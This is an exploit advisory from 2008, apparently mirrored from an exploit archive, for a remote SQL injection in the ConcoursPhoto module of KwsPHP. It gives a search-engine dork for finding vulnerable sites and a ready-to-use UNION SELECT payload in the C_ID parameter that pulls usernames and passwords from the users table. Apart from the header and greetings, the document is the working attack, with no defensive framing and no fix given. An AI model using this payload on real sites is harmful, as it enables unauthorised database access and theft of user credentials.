KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability

2008-04-03 00:00:00

#########################################################################
KwsPHP Module ConcoursPhoto Remote SQL Injection Exploit
#########################################################################

## AUTHOR : Stack-Terrorist [v40]
## Email : [email protected]
## Home : http://v4-team.com & http://stack-terrorist.com
## Script : KwsPHP Module ConcoursPhoto
## Bug : Remote SQL Injection Exploit
## Dork : inurl:index.php?mod=ConcoursPhoto

## EXPLOITS :

http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*

## GREETZ : All muslims Hackers
## speacial thnx to : str0ke

#########################################################################
Stack-Terrorist [v40]
#########################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.